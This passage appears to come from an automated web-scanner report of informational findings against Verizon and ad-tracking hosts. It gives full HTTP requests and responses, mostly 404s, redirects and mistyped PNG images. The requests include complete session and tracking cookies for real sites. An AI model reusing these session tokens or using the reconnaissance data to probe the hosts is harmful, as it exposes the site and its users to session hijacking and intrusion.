</head>
<body>

<!-- Insert any code or tags between here -->

<!-- "Verizon Small Business" c/
...[SNIP]...

24.6. http://d1qpxk1wfeh8v1.cloudfront.net/tags/totaltagdefault.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://d1qpxk1wfeh8v1.cloudfront.net
Path:   /tags/totaltagdefault.html

Request

GET /tags/totaltagdefault.html HTTP/1.1
Host: d1qpxk1wfeh8v1.cloudfront.net
Proxy-Connection: keep-alive
Referer: http://www22.verizon.com/residential/fiostv?CMP=DMC-CV090057
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 200 OK
x-amz-id-2: rZPoYQaUGLQ6sKLppFSf79qH3elcMVZfCjuimsJIWwl3Dhw9+pjq1ESBDE8xfdiw
x-amz-request-id: B03BB6A02002DEF8
Date: Fri, 05 Nov 2010 03:32:36 GMT
x-amz-meta-s3fox-filesize: 450
x-amz-meta-s3fox-modifiedtime: 1288200776090
Last-Modified: Wed, 27 Oct 2010 17:34:50 GMT
ETag: "0fc31b6da653526a0d1e7edd0df50c5e"
Accept-Ranges: bytes
Content-Type: text/html
Content-Length: 450
Server: AmazonS3
Age: 32621
X-Cache: Hit from cloudfront
X-Amz-Cf-Id: ca02ba0e614f8a3041933a50777f096145af8cca3e15cdc5b84b7f316a4350075781b2aefd6cde6f
Via: 1.0 a4a33eb6d328de8565b9c9b34e7c790d.cloudfront.net:11180 (CloudFront), 1.0 3db863a26c95a97ff57e55bdbbf10793.cloudfront.net:11180 (CloudFront)
Connection: keep-alive

<html><!-- "Verizon" c/o "Cadreon", segment: 'Total Tag Default - DO NOT USE' - DO NOT MODIFY THIS PIXEL IN ANY WAY -->
<script src="http://segment-pixel.invitemedia.com/pixel?pixelID=29265&partnerI
...[SNIP]...

24.7. http://dcshm.verizon.net/dcsjcxdpzghjg5e6ym5wj21gv_1r5z/wtid.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://dcshm.verizon.net
Path:   /dcsjcxdpzghjg5e6ym5wj21gv_1r5z/wtid.js

Request

GET /dcsjcxdpzghjg5e6ym5wj21gv_1r5z/wtid.js HTTP/1.1
Host: dcshm.verizon.net
Proxy-Connection: keep-alive
Referer: http://webmail.verizon.net/signin/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: POPLocation=popip=50.23.123.106&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&vec=&vsbb=&pts=&online_backup=&audio_conf=&smb_premmail=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=; POPRefid=refid=&refresh=y&reftrytime=0&refnum=; lob=webmail

Response

HTTP/1.1 404 Not Found
Content-Length: 103
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Mon, 05 Sep 2011 22:18:42 GMT
Connection: close

<html><head><title>Error</title></head><body>The system cannot find the file specified.
</body></html>

24.8. http://dcshm.verizon.net/dcso2yy35hhjg5e6ym5wj21gv_6r3b/wtid.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://dcshm.verizon.net
Path:   /dcso2yy35hhjg5e6ym5wj21gv_6r3b/wtid.js

Request

GET /dcso2yy35hhjg5e6ym5wj21gv_6r3b/wtid.js HTTP/1.1
Host: dcshm.verizon.net
Proxy-Connection: keep-alive
Referer: http://surround.verizon.com/Shop/Utilities/verizonyourdomain.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: lob=webmail; WEBTRENDS_ID=50.23.123.106-3158466032.30174233::046E21CED6AA0DE4777A384B405EDE54; POPLocation=popip=50.23.123.106&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&vec=&vsbb=&pts=&online_backup=&audio_conf=&smb_premmail=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=; POPRefid=refid=&refresh=y&reftrytime=0&refnum=

Response

HTTP/1.1 404 Not Found
Content-Length: 103
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Mon, 05 Sep 2011 22:21:17 GMT
Connection: close

<html><head><title>Error</title></head><body>The system cannot find the file specified.
</body></html>

24.9. http://ehg-verizon.hitbox.com/HG

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ehg-verizon.hitbox.com
Path:   /HG

Request

GET /HG HTTP/1.1
Host: ehg-verizon.hitbox.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 400 Bad Request
Date: Mon, 05 Sep 2011 22:35:21 GMT
Server: Hitbox Gateway 9.3.6-rc1
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP LAW NID PSA ADM OUR IND NAV COM"
Connection: close
Pragma: no-cache
Cache-Control: max-age=0, private, proxy-revalidate
Expires: Mon, 05 Sep 2011 22:35:22 GMT
Content-Type: text/html
Content-Length: 58

<html>
<body>
<p>400 Bad Request</p>
</body>
</html>

24.10. http://ehg-verizon.hitbox.com/HGct

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ehg-verizon.hitbox.com
Path:   /HGct

Request

GET /HGct HTTP/1.1
Host: ehg-verizon.hitbox.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 400 Bad Request
Date: Mon, 05 Sep 2011 22:35:21 GMT
Server: Hitbox Gateway 9.3.6-rc1
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP LAW NID PSA ADM OUR IND NAV COM"
Connection: close
Pragma: no-cache
Cache-Control: max-age=0, private, proxy-revalidate
Expires: Mon, 05 Sep 2011 22:35:22 GMT
Content-Type: text/html
Content-Length: 58

<html>
<body>
<p>400 Bad Request</p>
</body>
</html>

24.11. https://enterprisecenter.verizon.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   https://enterprisecenter.verizon.com
Path:   /

Request

GET / HTTP/1.1
Host: enterprisecenter.verizon.com
Connection: keep-alive
Referer: http://www.verizonbusiness.com/Medium/sign-in/vec/network.xml
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AkaUTrackingID=2EF56CE73C5AF5EC42EB764D612412CF; AkaSTrackingID=F002C16E2C0E27193BB48E08D6CA03F7; V347=0; GlobalSessionID=NES%2fpWJhBUqj3Wv6pct%2fhs3iw%3d%3d; HBXInitialVisit=Y; ReferenceSessionCookie=9/5/2011 6:15:59 PM; BTagRequired=N; lob=webmail; ONECMS_JSESSIONID=580zTlKQQs2ZXZn0jTJpTKD1zvC2pXZsPN78h5GKd2LS21dfkHD7!-1346721371; dtCookie=8C98328CB529EE605B41B254E42B3E4A; dtLatCT=1315279121983|1|297; dtSa=-; dtPC=G_1315279121513#_load_|G_1315279131706#_load_; dtLatC=157|173.5|1|297; BusinessUnit=residential; RegistrationApp=SessionId=f7b6c5b8-d3b0-4804-b482-0d60d28b823f; VZGEO=west; vsrecentsearches=oss%20sq~wss~xss~xss%20sq~; ED_SESSIONID=3lFzTlLPn3bjF74TvQ5hvTpG1NLZY6Ch55LynGnzjv4vbJTbpJTL!1857010759!-559043164; pref_lang=en-US; AIMSSESSIONID=12cTTlLQWJpG2WdmJ1n56z6lq4l7wM5TLkNq6z2RgpLJn697v8l1!-1788495886!154656592; AIMSPRESESSIONIDSIT=wJ75TlMM0FLQB8Bg9MqB6cJ9PPhDLLFCYyfFGZ3TqJLQN0GVvhMK!-1943483601!NONE; vzapps=ZIPCODE=10010; BPSPANISH=N; GBEOrdering=bannerid=vV8XV5a0k7UNCz0F4NS1Yy2ziu6e3G%2bpRnXX9Ts76mA%3d&redesignEnableFlag=YwUZzUxkyzg%3d&BundlesLP=is8rk0bMpSoz7R1F9vU7oNxRo1ehh781lEbxvp7l2Hs%3d; vzAppID=; LOB_CATEGORY=; CP=null*; TLTSID=90828BEED80D10D81818CE34DA2D2DF9; TLTUID=90828BEED80D10D81818CE34DA2D2DF9

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Content-Type: text/html
Last-Modified: Sun, 17 Jul 2011 07:09:28 GMT
ETag: W/"6f-4e228aa8"
Vary: accept-encoding
Expires: Mon, 05 Sep 2011 22:25:34 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Mon, 05 Sep 2011 22:25:34 GMT
Content-Length: 111
Connection: keep-alive

<HTML>
<HEAD>
<META HTTP-EQUIV="Refresh" CONTENT="0;URL=/enterprisesolutions/global/gHome.do">
</HEAD>
</HTML>

24.12. http://fls.doubleclick.net/activityi

Summary

Severity:   Information
Confidence:   Certain
Host:   http://fls.doubleclick.net
Path:   /activityi

Request

GET /activityi;src=1475931;type=corpo676;cat=veriz532;ord=321922022725.6525? HTTP/1.1
Host: fls.doubleclick.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www22.verizon.com/content/verizonglobalhome/ghp_business.aspx
Cookie: id=229a9504260100ca||t=1312233693|et=730|cs=002213fd4876a8a011eba88ea7

Response

HTTP/1.1 200 OK
X-Frame-Options: ALLOWALL
Server: Floodlight
Date: Mon, 05 Sep 2011 22:14:13 GMT
Expires: Mon, 05 Sep 2011 22:14:13 GMT
Cache-Control: private, max-age=0
X-Content-Type-Options: nosniff
Content-Type: text/html
Content-Length: 194
X-XSS-Protection: 1; mode=block

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"><html><head><title></title></head><body style="background-color: transparent"></body></html>

24.13. http://headlines.verizon.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://headlines.verizon.com
Path:   /

Request

GET / HTTP/1.1
Host: headlines.verizon.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?sourceid=chrome&ie=UTF-8&q=verizon+online+news+webmail#q=site:verizon.com+online+news+webmail&hl=en&prmd=ivns&ei=RVBlTuSuBePmiAKx7NyXCg&start=10&sa=N&bav=on.2,or.r_gc.r_pw.&fp=b7e6040383bebbf&biw=1266&bih=910
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AkaUTrackingID=2EF56CE73C5AF5EC42EB764D612412CF; AkaSTrackingID=F002C16E2C0E27193BB48E08D6CA03F7; V347=0; GlobalSessionID=NES%2fpWJhBUqj3Wv6pct%2fhs3iw%3d%3d; HBXInitialVisit=Y; ReferenceSessionCookie=9/5/2011 6:15:59 PM; BTagRequired=N; ONECMS_JSESSIONID=580zTlKQQs2ZXZn0jTJpTKD1zvC2pXZsPN78h5GKd2LS21dfkHD7!-1346721371; dtCookie=8C98328CB529EE605B41B254E42B3E4A; dtLatCT=1315279121983|1|297; dtSa=-; dtPC=G_1315279121513#_load_|G_1315279131706#_load_; dtLatC=157|173.5|1|297; BusinessUnit=residential; RegistrationApp=SessionId=f7b6c5b8-d3b0-4804-b482-0d60d28b823f; VZGEO=west; AIMSPRESESSIONIDSIT=wJ75TlMM0FLQB8Bg9MqB6cJ9PPhDLLFCYyfFGZ3TqJLQN0GVvhMK!-1943483601!NONE; vzapps=ZIPCODE=10010; BPSPANISH=N; GBEOrdering=bannerid=vV8XV5a0k7UNCz0F4NS1Yy2ziu6e3G%2bpRnXX9Ts76mA%3d&redesignEnableFlag=YwUZzUxkyzg%3d&BundlesLP=is8rk0bMpSoz7R1F9vU7oNxRo1ehh781lEbxvp7l2Hs%3d; vzAppID=; LOB_CATEGORY=; vsrecentsearches=xss%20sqli%20httpi~oss%20sq~wss~xss~xss%20sq; TLTSID=90828BEED80D10D81818CE34DA2D2DF9; TLTUID=90828BEED80D10D81818CE34DA2D2DF9; lob=dotcom; myservices=vzdock=N

Response

HTTP/1.1 200 OK
Server: Apache
Last-Modified: Wed, 14 Apr 2010 19:27:08 GMT
ETag: "50720f-cc-484375d2adb00"
Accept-Ranges: bytes
Content-Length: 204
Content-Type: text/html
Date: Mon, 05 Sep 2011 22:42:34 GMT
Connection: close
Vary: Accept-Encoding

<HTML>
<HEAD><TITLE>Headlines - Verizon - News, Information and Opinion</TITLE>
<META HTTP-EQUIV=Refresh CONTENT="0;
URL=http://headlines.verizon.com/headlines/portals/headlines.portal">
</HEAD>
</HT
...[SNIP]...

24.14. http://headlines.verizon.com/headlines/resources/images/featuredArticle.png

Summary

Severity:   Information
Confidence:   Certain
Host:   http://headlines.verizon.com
Path:   /headlines/resources/images/featuredArticle.png

Request

GET /headlines/resources/images/featuredArticle.png HTTP/1.1
Host: headlines.verizon.com
Proxy-Connection: keep-alive
Referer: http://headlines.verizon.com/headlines/portals/headlines.portal
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AkaUTrackingID=2EF56CE73C5AF5EC42EB764D612412CF; AkaSTrackingID=F002C16E2C0E27193BB48E08D6CA03F7; V347=0; GlobalSessionID=NES%2fpWJhBUqj3Wv6pct%2fhs3iw%3d%3d; HBXInitialVisit=Y; ReferenceSessionCookie=9/5/2011 6:15:59 PM; BTagRequired=N; ONECMS_JSESSIONID=580zTlKQQs2ZXZn0jTJpTKD1zvC2pXZsPN78h5GKd2LS21dfkHD7!-1346721371; dtCookie=8C98328CB529EE605B41B254E42B3E4A; dtLatCT=1315279121983|1|297; dtSa=-; dtPC=G_1315279121513#_load_|G_1315279131706#_load_; dtLatC=157|173.5|1|297; BusinessUnit=residential; RegistrationApp=SessionId=f7b6c5b8-d3b0-4804-b482-0d60d28b823f; VZGEO=west; AIMSPRESESSIONIDSIT=wJ75TlMM0FLQB8Bg9MqB6cJ9PPhDLLFCYyfFGZ3TqJLQN0GVvhMK!-1943483601!NONE; vzapps=ZIPCODE=10010; BPSPANISH=N; GBEOrdering=bannerid=vV8XV5a0k7UNCz0F4NS1Yy2ziu6e3G%2bpRnXX9Ts76mA%3d&redesignEnableFlag=YwUZzUxkyzg%3d&BundlesLP=is8rk0bMpSoz7R1F9vU7oNxRo1ehh781lEbxvp7l2Hs%3d; vzAppID=; LOB_CATEGORY=; vsrecentsearches=xss%20sqli%20httpi~oss%20sq~wss~xss~xss%20sq; TLTSID=90828BEED80D10D81818CE34DA2D2DF9; TLTUID=90828BEED80D10D81818CE34DA2D2DF9; lob=dotcom; myservices=vzdock=N; NEWSROOMDOTCOMAPPID=C2wVTlQhWhZTJgT6sl574LDMvplTc6PQJsryMW17PWjGSvv2qJ2y!-1366756756; WT_FPC=id=2d2e3ba6fdd517b830c1315269756381:lv=1315269756381:ss=1315269756381

Response

HTTP/1.1 200 OK
Server: Apache
Accept-Ranges: bytes
Last-Modified: Sun, 07 Oct 2007 02:16:14 GMT
X-Powered-By: Servlet/2.5 JSP/2.1
Content-Type: text/html
Content-Length: 1866
Date: Mon, 05 Sep 2011 22:42:51 GMT
Connection: close
Vary: Accept-Encoding

.PNG
.
...IHDR.......q......#`....gAMA....7.......tEXtSoftware.Adobe ImageReadyq.e<....IDATx......6..m.&..R._T....{..j..{.C.K...v.$.[.C&a...l.}.;.I2Yb>y.??B8..4.....p..(.B~...........Z..P!...]....|
...[SNIP]...

24.15. http://headlines.verizon.com/headlines/resources/images/followUsOnTwitter.png

Summary

Severity:   Information
Confidence:   Certain
Host:   http://headlines.verizon.com
Path:   /headlines/resources/images/followUsOnTwitter.png

Request

GET /headlines/resources/images/followUsOnTwitter.png HTTP/1.1
Host: headlines.verizon.com
Proxy-Connection: keep-alive
Referer: http://headlines.verizon.com/headlines/portals/headlines.portal
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AkaUTrackingID=2EF56CE73C5AF5EC42EB764D612412CF; AkaSTrackingID=F002C16E2C0E27193BB48E08D6CA03F7; V347=0; GlobalSessionID=NES%2fpWJhBUqj3Wv6pct%2fhs3iw%3d%3d; HBXInitialVisit=Y; ReferenceSessionCookie=9/5/2011 6:15:59 PM; BTagRequired=N; ONECMS_JSESSIONID=580zTlKQQs2ZXZn0jTJpTKD1zvC2pXZsPN78h5GKd2LS21dfkHD7!-1346721371; dtCookie=8C98328CB529EE605B41B254E42B3E4A; dtLatCT=1315279121983|1|297; dtSa=-; dtPC=G_1315279121513#_load_|G_1315279131706#_load_; dtLatC=157|173.5|1|297; BusinessUnit=residential; RegistrationApp=SessionId=f7b6c5b8-d3b0-4804-b482-0d60d28b823f; VZGEO=west; AIMSPRESESSIONIDSIT=wJ75TlMM0FLQB8Bg9MqB6cJ9PPhDLLFCYyfFGZ3TqJLQN0GVvhMK!-1943483601!NONE; vzapps=ZIPCODE=10010; BPSPANISH=N; GBEOrdering=bannerid=vV8XV5a0k7UNCz0F4NS1Yy2ziu6e3G%2bpRnXX9Ts76mA%3d&redesignEnableFlag=YwUZzUxkyzg%3d&BundlesLP=is8rk0bMpSoz7R1F9vU7oNxRo1ehh781lEbxvp7l2Hs%3d; vzAppID=; LOB_CATEGORY=; vsrecentsearches=xss%20sqli%20httpi~oss%20sq~wss~xss~xss%20sq; TLTSID=90828BEED80D10D81818CE34DA2D2DF9; TLTUID=90828BEED80D10D81818CE34DA2D2DF9; lob=dotcom; myservices=vzdock=N; NEWSROOMDOTCOMAPPID=C2wVTlQhWhZTJgT6sl574LDMvplTc6PQJsryMW17PWjGSvv2qJ2y!-1366756756; WT_FPC=id=2d2e3ba6fdd517b830c1315269756381:lv=1315269756381:ss=1315269756381

Response

HTTP/1.1 200 OK
Server: Apache
Accept-Ranges: bytes
Last-Modified: Thu, 09 Sep 2010 00:11:00 GMT
X-Powered-By: Servlet/2.5 JSP/2.1
Content-Type: text/html
Content-Length: 2430
Date: Mon, 05 Sep 2011 22:42:36 GMT
Connection: close
Vary: Accept-Encoding

.PNG
.
...IHDR...|..........q......gAMA....7.......tEXtSoftware.Adobe ImageReadyq.e<..    .IDATx..Y{.Tg.?.9s......Y`....+.d.S...KklK..H.......#eS..    ..j...H.A.lURMmX..6.Y.*.OX*m....sg.3;3w...w..s;.....c
...[SNIP]...

24.16. http://headlines.verizon.com/headlines/resources/images/navOff_02.png

Summary

Severity:   Information
Confidence:   Certain
Host:   http://headlines.verizon.com
Path:   /headlines/resources/images/navOff_02.png

Request

GET /headlines/resources/images/navOff_02.png HTTP/1.1
Host: headlines.verizon.com
Proxy-Connection: keep-alive
Referer: http://headlines.verizon.com/headlines/portals/headlines.portal
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AkaUTrackingID=2EF56CE73C5AF5EC42EB764D612412CF; AkaSTrackingID=F002C16E2C0E27193BB48E08D6CA03F7; V347=0; GlobalSessionID=NES%2fpWJhBUqj3Wv6pct%2fhs3iw%3d%3d; HBXInitialVisit=Y; ReferenceSessionCookie=9/5/2011 6:15:59 PM; BTagRequired=N; ONECMS_JSESSIONID=580zTlKQQs2ZXZn0jTJpTKD1zvC2pXZsPN78h5GKd2LS21dfkHD7!-1346721371; dtCookie=8C98328CB529EE605B41B254E42B3E4A; dtLatCT=1315279121983|1|297; dtSa=-; dtPC=G_1315279121513#_load_|G_1315279131706#_load_; dtLatC=157|173.5|1|297; BusinessUnit=residential; RegistrationApp=SessionId=f7b6c5b8-d3b0-4804-b482-0d60d28b823f; VZGEO=west; AIMSPRESESSIONIDSIT=wJ75TlMM0FLQB8Bg9MqB6cJ9PPhDLLFCYyfFGZ3TqJLQN0GVvhMK!-1943483601!NONE; vzapps=ZIPCODE=10010; BPSPANISH=N; GBEOrdering=bannerid=vV8XV5a0k7UNCz0F4NS1Yy2ziu6e3G%2bpRnXX9Ts76mA%3d&redesignEnableFlag=YwUZzUxkyzg%3d&BundlesLP=is8rk0bMpSoz7R1F9vU7oNxRo1ehh781lEbxvp7l2Hs%3d; vzAppID=; LOB_CATEGORY=; vsrecentsearches=xss%20sqli%20httpi~oss%20sq~wss~xss~xss%20sq; TLTSID=90828BEED80D10D81818CE34DA2D2DF9; TLTUID=90828BEED80D10D81818CE34DA2D2DF9; lob=dotcom; myservices=vzdock=N; NEWSROOMDOTCOMAPPID=C2wVTlQhWhZTJgT6sl574LDMvplTc6PQJsryMW17PWjGSvv2qJ2y!-1366756756; WT_FPC=id=2d2e3ba6fdd517b830c1315269756381:lv=1315269756381:ss=1315269756381

Response

HTTP/1.1 200 OK
Server: Apache
Accept-Ranges: bytes
Last-Modified: Fri, 05 Mar 2010 04:16:04 GMT
X-Powered-By: Servlet/2.5 JSP/2.1
Content-Type: text/html
Content-Length: 368
Date: Mon, 05 Sep 2011 22:42:36 GMT
Connection: close
Vary: Accept-Encoding

.PNG
.
...IHDR...&..........G......gAMA....7.......tEXtSoftware.Adobe ImageReadyq.e<....IDATx....    .0...t.;B;..AG....:......PWp.f.G....H..` ....%g....O...(..S    `......VU......~..B-...w...... /.| ..r..
...[SNIP]...

24.17. http://headlines.verizon.com/headlines/resources/images/navOff_03.png

Summary

Severity:   Information
Confidence:   Certain
Host:   http://headlines.verizon.com
Path:   /headlines/resources/images/navOff_03.png

Request

GET /headlines/resources/images/navOff_03.png HTTP/1.1
Host: headlines.verizon.com
Proxy-Connection: keep-alive
Referer: http://headlines.verizon.com/headlines/portals/headlines.portal
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AkaUTrackingID=2EF56CE73C5AF5EC42EB764D612412CF; AkaSTrackingID=F002C16E2C0E27193BB48E08D6CA03F7; V347=0; GlobalSessionID=NES%2fpWJhBUqj3Wv6pct%2fhs3iw%3d%3d; HBXInitialVisit=Y; ReferenceSessionCookie=9/5/2011 6:15:59 PM; BTagRequired=N; ONECMS_JSESSIONID=580zTlKQQs2ZXZn0jTJpTKD1zvC2pXZsPN78h5GKd2LS21dfkHD7!-1346721371; dtCookie=8C98328CB529EE605B41B254E42B3E4A; dtLatCT=1315279121983|1|297; dtSa=-; dtPC=G_1315279121513#_load_|G_1315279131706#_load_; dtLatC=157|173.5|1|297; BusinessUnit=residential; RegistrationApp=SessionId=f7b6c5b8-d3b0-4804-b482-0d60d28b823f; VZGEO=west; AIMSPRESESSIONIDSIT=wJ75TlMM0FLQB8Bg9MqB6cJ9PPhDLLFCYyfFGZ3TqJLQN0GVvhMK!-1943483601!NONE; vzapps=ZIPCODE=10010; BPSPANISH=N; GBEOrdering=bannerid=vV8XV5a0k7UNCz0F4NS1Yy2ziu6e3G%2bpRnXX9Ts76mA%3d&redesignEnableFlag=YwUZzUxkyzg%3d&BundlesLP=is8rk0bMpSoz7R1F9vU7oNxRo1ehh781lEbxvp7l2Hs%3d; vzAppID=; LOB_CATEGORY=; vsrecentsearches=xss%20sqli%20httpi~oss%20sq~wss~xss~xss%20sq; TLTSID=90828BEED80D10D81818CE34DA2D2DF9; TLTUID=90828BEED80D10D81818CE34DA2D2DF9; lob=dotcom; myservices=vzdock=N; NEWSROOMDOTCOMAPPID=C2wVTlQhWhZTJgT6sl574LDMvplTc6PQJsryMW17PWjGSvv2qJ2y!-1366756756; WT_FPC=id=2d2e3ba6fdd517b830c1315269756381:lv=1315269756381:ss=1315269756381

Response

HTTP/1.1 200 OK
Server: Apache
Accept-Ranges: bytes
Last-Modified: Fri, 05 Mar 2010 04:16:04 GMT
X-Powered-By: Servlet/2.5 JSP/2.1
Content-Type: text/html
Content-Length: 543
Date: Mon, 05 Sep 2011 22:42:36 GMT
Connection: close
Vary: Accept-Encoding

.PNG
.
...IHDR...:............e....gAMA....7.......tEXtSoftware.Adobe ImageReadyq.e<....IDATx..W.m.0............d..!....#.#.+..G(#..^zY$...*./Y.......Q..R..../b.h&...o{...u]..0..cK]Em...........V..
...[SNIP]...

24.18. http://headlines.verizon.com/headlines/resources/images/navOff_04.png

Summary

Severity:   Information
Confidence:   Certain
Host:   http://headlines.verizon.com
Path:   /headlines/resources/images/navOff_04.png

Request

GET /headlines/resources/images/navOff_04.png HTTP/1.1
Host: headlines.verizon.com
Proxy-Connection: keep-alive
Referer: http://headlines.verizon.com/headlines/portals/headlines.portal
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AkaUTrackingID=2EF56CE73C5AF5EC42EB764D612412CF; AkaSTrackingID=F002C16E2C0E27193BB48E08D6CA03F7; V347=0; GlobalSessionID=NES%2fpWJhBUqj3Wv6pct%2fhs3iw%3d%3d; HBXInitialVisit=Y; ReferenceSessionCookie=9/5/2011 6:15:59 PM; BTagRequired=N; ONECMS_JSESSIONID=580zTlKQQs2ZXZn0jTJpTKD1zvC2pXZsPN78h5GKd2LS21dfkHD7!-1346721371; dtCookie=8C98328CB529EE605B41B254E42B3E4A; dtLatCT=1315279121983|1|297; dtSa=-; dtPC=G_1315279121513#_load_|G_1315279131706#_load_; dtLatC=157|173.5|1|297; BusinessUnit=residential; RegistrationApp=SessionId=f7b6c5b8-d3b0-4804-b482-0d60d28b823f; VZGEO=west; AIMSPRESESSIONIDSIT=wJ75TlMM0FLQB8Bg9MqB6cJ9PPhDLLFCYyfFGZ3TqJLQN0GVvhMK!-1943483601!NONE; vzapps=ZIPCODE=10010; BPSPANISH=N; GBEOrdering=bannerid=vV8XV5a0k7UNCz0F4NS1Yy2ziu6e3G%2bpRnXX9Ts76mA%3d&redesignEnableFlag=YwUZzUxkyzg%3d&BundlesLP=is8rk0bMpSoz7R1F9vU7oNxRo1ehh781lEbxvp7l2Hs%3d; vzAppID=; LOB_CATEGORY=; vsrecentsearches=xss%20sqli%20httpi~oss%20sq~wss~xss~xss%20sq; TLTSID=90828BEED80D10D81818CE34DA2D2DF9; TLTUID=90828BEED80D10D81818CE34DA2D2DF9; lob=dotcom; myservices=vzdock=N; NEWSROOMDOTCOMAPPID=C2wVTlQhWhZTJgT6sl574LDMvplTc6PQJsryMW17PWjGSvv2qJ2y!-1366756756; WT_FPC=id=2d2e3ba6fdd517b830c1315269756381:lv=1315269756381:ss=1315269756381

Response

HTTP/1.1 200 OK
Server: Apache
Accept-Ranges: bytes
Last-Modified: Fri, 05 Mar 2010 04:16:04 GMT
X-Powered-By: Servlet/2.5 JSP/2.1
Content-Type: text/html
Content-Length: 556
Date: Mon, 05 Sep 2011 22:42:36 GMT
Connection: close
Vary: Accept-Encoding

.PNG
.
...IHDR...B.........tKJ    ....gAMA....7.......tEXtSoftware.Adobe ImageReadyq.e<....IDATx..W.m.@.M..@G...
d.2B..F......a.0B....>K....i../[....?xg.`....i.zs......p ...3..,......p.M..Z3.{.g.....t#
...[SNIP]...

24.19. http://headlines.verizon.com/headlines/resources/images/navOff_05.png

Summary

Severity:   Information
Confidence:   Certain
